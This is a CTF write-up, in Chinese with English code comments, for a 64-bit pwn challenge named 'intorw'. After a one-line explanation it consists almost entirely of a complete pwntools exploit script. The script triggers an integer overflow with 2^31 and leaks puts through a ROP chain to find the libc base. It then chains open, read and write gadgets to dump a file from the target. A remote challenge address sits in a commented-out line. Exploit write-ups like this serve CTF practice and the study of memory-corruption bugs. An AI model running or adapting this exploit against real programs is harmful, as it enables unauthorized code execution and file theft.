这道题目就是很简单的整数溢出+rop。
exp
这个exp要区分本地的libc和远程的libc,具体我就不修改了,本地打就把后面的一个gadget的代码改一改。
from pwn import *
# pwntools context: 64-bit target, verbose I/O logging on every send/recv.
context.update(arch='amd64', log_level='debug')
# The challenge binary and the libc used for the remote target (per the note
# above, the local libc must be substituted when running locally).
elf = ELF('./intorw')
libc = ELF('./old_libc.so.6')
# First 'pop rdi; ret' gadget in the binary itself -- usable before any libc
# address is known.
poprdi = next(elf.search(asm('pop rdi;ret')))
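def look(sh):
    """Attach gdb to *sh* with a breakpoint at 0x0400A40 and pause the script.

    Debugging helper only; as shown on the page the body was not indented,
    which is a SyntaxError, so the indentation is restored here.
    """
    gdb.attach(sh, "b *0x0400A40")
    pause()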
#sh = remote("43.143.7.97",28284)
sh = process(argv=['./intorw'])#,env={'LD_PRELOAD':'/home/gao/Desktop/intorw/libc.so.6'})
# Stage 1: the integer overflow at the length prompt.
# 2147483648 == 2**31; as a signed 32-bit int this wraps to INT_MIN, which is
# presumably how a signed length check is passed while the value is still used
# as a large read size (the binary is not shown here -- confirm in the
# disassembly).  On the program side the fix is to validate the count as an
# unsigned value against the buffer size before reading.
sh.sendlineafter("Please enter how many bits you want to read\n",str(2147483648))
# main is not used by either chain below; vuln is the return target after the leak.
main=0x00400A47
vuln=0x0004009C4
# Stage-1 chain: 0x20 bytes of buffer + 8 (presumably the saved rbp), then
# puts(puts@got) to leak a libc address, then return into vuln for stage 2.
payload=b'a'*(0x20+8)+p64(poprdi)+p64(elf.got["puts"])+p64(elf.plt["puts"])+p64(vuln)
sh.sendlineafter(b"Please enter what you want to read:\n",payload)
# Parse the leak: read up to the first 0x7f byte (assumed to be the top byte of
# the leaked address), keep the last 6 bytes, zero-extend to 8, and subtract
# puts's offset to obtain the libc base.
libc_base = u64(sh.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.sym['puts']
libc.address = libc_base
print("[*]")
print(hex(libc.address))
# libc.address is now rebased, so these symbols are absolute addresses.
openn=libc.sym["open"]
write=libc.sym["write"]
read=libc.sym["read"]
print("[*]")
print(hex(openn))
print("[*]")
print(hex(write))
print("[*]")
print(hex(read))
# Writable address in the binary (appears non-PIE: fixed 0x40xxxx/0x60xxxx
# addresses) used as scratch space below: gift+38 is passed to open() as the
# path pointer and gift receives read()'s output, so a path string is
# presumably expected at gift+38 -- verify in the binary.
gift=0x000601020
#poprdi = next(elf.search(asm('pop rdi;ret')))
# Gadgets are now taken from the rebased libc.  Note this rebinds poprdi; the
# ELF copy found earlier was only used by the stage-1 chain.
poprdi=next(libc.search(asm("pop rdi;ret")))
poprsi=next(libc.search(asm("pop rsi;ret")))
poprdxr12=next(libc.search(asm("pop rdx;pop r12;ret")))
ret=next(libc.search(asm("ret")))
# Translation of the author's note below: the overall goal is to get the fd
# returned by open() into rdi as read()'s first argument, which avoids having
# to guess whether the fd on the remote machine is 3.
'''
总的目的就是实现open后的fd传入rdi,作为read的第一个参数。
我这样有一个好处,就是打开文件后直接传参数到rdi,不必去猜对方机器打开的fd是否是3。
'''
# Gadget that copies open()'s return value (eax = fd) into edi; the trailing
# cmp rdx,rcx is part of the gadget.  Per the author, its offset differs per
# libc and has to be located for the target libc.
movrdirax=next(libc.search(asm("mov edi,eax;cmp rdx,rcx")))
# rcx/rbx are preloaded so the cmp in the gadget above does not disturb the
# chain (what follows the cmp in that gadget is not shown here -- check the
# gadget's full tail in the target libc).
poprcxrbx=next(libc.search(asm("pop rcx;pop rbx;ret;")))
# Stage 2, call 1: open(gift+38, 0, 0) -- rsi=0 is the flags argument
# (O_RDONLY), rdx=0 the mode.  poprdxr12 pops two values, hence two p64(0).
payload2=b'a'*(0x20+8)+p64(poprdi)+p64(gift+38)+p64(poprsi)+p64(0)+p64(poprdxr12)+p64(0)+p64(0)+p64(openn)
# fd (eax) -> edi via the gadget; 555 is presumably an arbitrary filler for rcx/rbx.
payload2+=p64(poprcxrbx)+p64(555)+p64(555)+p64(movrdirax)
# Call 2: read(fd, gift, 40) -- rdi still holds the fd from the gadget above.
payload2+=p64(poprsi)+p64(gift)+p64(poprdxr12)+p64(40)+p64(0)+p64(read)
# Call 3: write(1, gift, 40) -- echo the 40 bytes read back to stdout.
payload2+=p64(poprdi)+p64(1)+p64(poprsi)+p64(gift)+p64(poprdxr12)+p64(40)+p64(0)+p64(write)
# Same overflow trigger as stage 1; the program is back at vuln's length prompt.
sh.sendlineafter("Please enter how many bits you want to read\n",str(2147483648))
#look(sh)
# Note: sendafter (no trailing newline) here, unlike sendlineafter in stage 1.
sh.sendafter("Please enter what you want to read:\n",payload2)
sh.interactive()